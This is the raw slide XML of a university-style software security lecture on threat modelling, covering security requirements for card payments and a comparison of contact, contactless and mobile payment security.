            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Seventh Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Eighth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Ninth Outline Level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92B7C86-8599-C079-C656-668FE8FC2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6237288"/>
            <a:ext cx="3960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BE2F747-AC0A-CD9F-185D-471F9A695B6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</a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F686F6B1-1E75-43F6-8C0B-9A6873E8102B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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-3429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4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400">
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0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400">
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0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333375"/>
            <a:ext cx="77692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7769225" cy="469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outline text format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Second Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Third Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Seventh Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Eighth Outline Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16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24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1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="16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</a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FABA5324-E6A6-4B49-BD3F-B6F38BE0C145}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›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25518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hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" defTabSz="49212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ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="ctr" defTabSz="49212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2pPr>
      <a:lvl3pPr algn="ctr" defTabSz="49212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3pPr>
      <a:lvl4pPr algn="ctr" defTabSz="49212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4pPr>
      <a:lvl5pPr algn="ctr" defTabSz="492125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5pPr>
      <a:lvl6pPr marL="2514600" indent="-228600" algn="ctr" defTabSz="492125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6pPr>
      <a:lvl7pPr marL="2971800" indent="-228600" algn="ctr" defTabSz="492125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7pPr>
      <a:lvl8pPr marL="3429000" indent="-228600" algn="ctr" defTabSz="492125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8pPr>
      <a:lvl9pPr marL="3886200" indent="-228600" algn="ctr" defTabSz="492125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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" defTabSz="492125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4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1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="492125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2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="492125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3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="492125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4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="492125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5pPr>
      <a:lvl6pPr marL="2514600" indent="-228600" algn="l" defTabSz="492125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cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2971800" indent="-228600" algn="l" defTabSz="492125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cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3429000" indent="-228600" algn="l" defTabSz="492125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cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3886200" indent="-228600" algn="l" defTabSz="492125" rtl="0" fontAlgn="base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80F32C-6239-F15A-8B68-C6F17AD7E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E562E0-C670-C6A2-9BB4-DD7443DB5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     Give a man a zero-day and he’ll have access for a day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>     Teach a man to phish and he’ll have access for life</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>-- The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Grugq</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2305502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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC7AE14D-B1CB-192B-F2AC-0310C6D07B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2565400"/>
            <a:ext cx="7770813" cy="863600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" altLang="en-NL" sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="2000" dirty="0"/>
              <a:t>Software Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-NL" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="en-NL" sz="3600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="3200" dirty="0"/>
              <a:t>Threat Modelling</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="3200" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="3200" dirty="0"/>
              <a:t>All other vulnerability categories</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-NL" sz="3200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="3200" dirty="0"/>
              <a:t>(besides memory corruption)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-NL" sz="3600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-NL" altLang="en-NL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8CBB84-8759-58CC-CDB9-0A3CE6604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security = getting rid of bugs?</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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D03DB0-5101-6D67-21CD-3020802FD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Story of the past weeks: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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         How to find, mitigate or prevent memory corruption bugs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Underlying idea:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>           fewer memory corruption bugs  =  more secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5715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We can broaden this approach at more categories of security vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pros of this approach  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>very generic and application-agnostic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cons of the approach</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>it is incomplete &amp; possibly not the most effective </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What does it really mean for an application to be secure?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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="5715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394758-D694-9AF2-34D2-611D2E35BEF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CED3F7E-F169-41D6-9124-106512418DFA}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>3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03619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1BAD4-A344-EA1B-9946-140885AF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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1377E460-3B8F-0B56-D6D3-0DFC46CF8F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 sz="2400" dirty="0"/>
              <a:t>What does security mean?</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" altLang="en-NL" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{685431B5-4831-C7C8-3592-7749F8E402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5013325"/>
            <a:ext cx="7770813" cy="1081088"/>
          </a:xfrm>
        </p:spPr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NL" sz="1800" i="1" dirty="0"/>
              <a:t>Security requirements?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NL" sz="1800" i="1" dirty="0"/>
              <a:t>Security controls aka security mechanisms?</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" altLang="en-NL" sz="1800" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55300" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19FA5DE4-B190-8450-33A7-0EEEF380BA7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E90250F-18FA-4742-837D-880811E489B3}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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868A4F4-61BD-35C9-7CD4-1C2F9E29B1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83" t="24245" r="40953"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987824" y="1340768"/>
            <a:ext cx="3851768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4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8CD9E-0EBC-A743-BAD8-0C4EE1010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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32946A8F-C8FC-04E1-5AC5-4B321171F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 sz="2400" dirty="0"/>
              <a:t>Some of the security requirements &amp; control</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" altLang="en-NL" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C99A3B80-B81C-6604-544F-EF8A26D642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124744"/>
            <a:ext cx="7770813" cy="5041900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Non-repudiation of payment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/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 card holder cannot deny that they agreed to payment;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/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 terminal obtains proof of payment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="400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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authentication of user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/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 with PIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="400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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authentication of the card</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/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 using key material in the card </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="300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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Confidentiality of key material in the card</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No memory corruption bugs or other vulnerabilities in card &amp; terminal software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/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          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-NL" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56324" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD074FAA-BCDA-B372-01C8-1513250E2A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8F792336-70CB-49C0-810C-037D0C24C16C}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>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141675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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8B20700-A682-66CF-FAFC-E92A6B26EC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 sz="2400"/>
              <a:t>Which of these is more secure?</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" altLang="en-NL" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEE7181B-0FBE-4FB2-B86F-049C34E06A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5013325"/>
            <a:ext cx="7770813" cy="1081088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-NL" sz="1800" i="1" dirty="0"/>
              <a:t>Differences in attack surface, TCB, security mechanisms, ...?   </a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" altLang="en-NL" sz="1800" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55300" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC9B3EC-7E94-4623-6A10-E333D5B5626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E90250F-18FA-4742-837D-880811E489B3}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-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BAFF42-AACA-174B-D9DE-968D22B728D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970782" y="3412961"/>
            <a:ext cx="1439862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r">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>contact </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>payment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  with PIN</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="20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8BAF2B-2AEE-A974-6F82-20A6D23DD0E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3399989" y="3412961"/>
            <a:ext cx="19431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r">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>contactless </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>payment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  without  PIN</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="20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5F264F-B3F3-8DFC-E5C4-139E7A4B7D64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6372200" y="3412961"/>
            <a:ext cx="15113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r">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mobile payment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="20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39D456-198F-6F79-8CFF-8BF103A163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5849" r="588" b="1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5982608" y="1268760"/>
            <a:ext cx="2716490" cy="1960167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="How Safe is Your Data with Contactless Payments? - Maytech">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5D51C12-E808-DCD9-0F0D-1917A023A7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44"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3154899" y="1299335"/>
            <a:ext cx="2716490" cy="19295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2DD81F-83D1-CD29-649F-6DB422B199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83" t="24245" r="40953"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
